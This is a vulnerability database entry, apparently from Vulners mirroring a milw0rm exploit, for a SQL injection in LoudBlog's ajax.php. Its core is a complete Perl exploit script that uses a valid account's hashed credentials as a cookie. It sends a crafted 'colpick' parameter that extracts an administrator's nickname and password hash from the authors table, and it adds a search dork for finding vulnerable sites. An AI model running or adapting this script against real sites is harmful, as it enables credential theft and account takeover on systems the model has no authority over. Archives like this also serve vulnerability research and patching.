Lucene search
K

LoudBlog <= 0.8.0a (ajax.php) SQL Injection Vulnerability (auth)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

LoudBlog 0.8.0a SQL Injection Vulnerabilit

Code

                                                #!/usr/bin/perl
# This Exploit requires a valid user name and password of an account regardless of the permissions
#
# Author: Xianur0
# Affected: All Versions
# Bug: SQL Injection
# 
# Doorks:
#  allintext: &#34;powered by LoudBlog&#34;


  use HTTP::Request::Common qw(POST);
  use LWP::UserAgent;
  use Digest::MD5 qw(md5_hex);
  $ua = LWP::UserAgent-&#62;new;

print &#34;\n             LoudBlog Exploit All Version By Xianur0\n\n&#34;;
$uri = $ARGV[0];
$id = $ARGV[1];
$password = $ARGV[3] || die(&#34;\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n&#34;);
$md5 = md5_hex($ARGV[2]).&#34;:&#34;.md5_hex($password);

  my $req = POST $uri.&#39;/loudblog/ajax.php&#39;,
                [ colpick =&#62; &#34;concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)&#34;, rowpick =&#62; &#34;id&#34;, rowval =&#62; $id, table =&#62; &#39;authors&#39;, action =&#62; &#39;singleread&#39;];
$req-&#62;header(&#39;User-Agent&#39; =&#62; &#39;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17&#39;);
$req-&#62;header(&#39;Cookie&#39; =&#62; &#39;lbauth=&#39;.$md5);
$res = $ua-&#62;request($req);
  print $res-&#62;content.&#34;\n&#34;; 

# milw0rm.com [2008-10-22]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
25